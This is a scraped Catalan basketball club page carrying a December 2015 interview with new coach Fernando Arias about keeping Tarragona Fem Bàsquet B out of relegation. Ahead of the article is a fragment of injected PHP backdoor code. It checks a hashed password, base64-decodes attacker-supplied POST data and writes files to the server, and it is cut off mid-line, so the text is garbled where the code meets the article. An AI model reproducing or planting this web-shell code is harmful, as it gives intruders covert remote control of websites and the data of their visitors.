function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Fernando Arias: "Tenim possibilitats factibles de jugar el play-off de descens" - Tgn Bàsquet Club -

Fernando Arias: “Tenim possibilitats factibles de jugar el play-off de descens”

By
Updated: desembre 9, 2015

El Tarragona Fem Bàsquet B comença una nova etapa. El TGN Bàsquet va decidir fer un canvi en la direcció de l’equip per intentar canviar una dinàmica de resultats negatius (0 victòries i 10 derrotes) i va triar Fernando Arias (4/3/1988) per impulsar la trajectòria del conjunt lila a Primera Catalana Femenina. Arias, exjugador del Nàstic i ADT, llicenciat en Ciències de l’Activitat Física i l’Esport, va desenvolupar la seva carrera com a tècnic a l’ADT, quan el conjunt de Torreforta militava en categories professionals. Després d’aquella etapa va aterrar al CBT on, el curs passat, va ser ajudant d’Albert del Rey -actual tècnic del Tarragona Fem Bàsquet a Copa Catalunya Femenina- a Primera Catalana Femenina.

Arias es troba davant d’un repte important però ho afronta amb optimisme: “La dinàmica de l’equip és complicada, però això suposa un repte i s’ha d’agafar amb il·lusió”. El nou tècnic del Tarragona Fem Bàsquet B assegura que s’han de treballar diferents aspectes del joc per poder intentar evitar el descens directe (perden la categoria els dos últims classificats): “Hem de treballar moltes coses, sobretot en defensa, ajudes o rebot defensiu per exemple. Comencem 0-10 i hem perdut l’average amb equips de la part baixa de la classificació. Això és un handicap important i hem de treballar molt dur per fer-ho millor. El que és evident és que, ara per ara, som l’equip cuer de la classificació però tenim possibilitats factibles, si fem allò que hem de fer, de jugar el playoff de descens i si ho fem genial i perfecte podríem evitar, fins i tot, aquesta eliminatòria”.

El Tarragona Fem Bàsquet B ha estat un equip marcat per la irregularitat en els seus partits, primeres meitats molt bones i segones parts on el conjunt desapareixia de la pista. Per Arias tot depèn de recuperar la confiança de les jugadores i definir clarament el paper de cada jugadora dins l’equip: “Hem de recuperar les bones sensacions. Tenim un equip jove, la majoria són jugadores sèniors de primer o segon any i això fa que costi assumir la responsabilitat en els moments difícils. Intentarem córrer més, tirar més a cistella que el nostre rival i ser més dures a cistella. Hem de tenir les idees clares de qui volem que estiri del carro en els moments complicats”.

Fernando Arias debutarà aquest diumenge a la pista del Lleida (quart classificat amb 7 victòries i 3 derrotes) a les 17.45 h.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *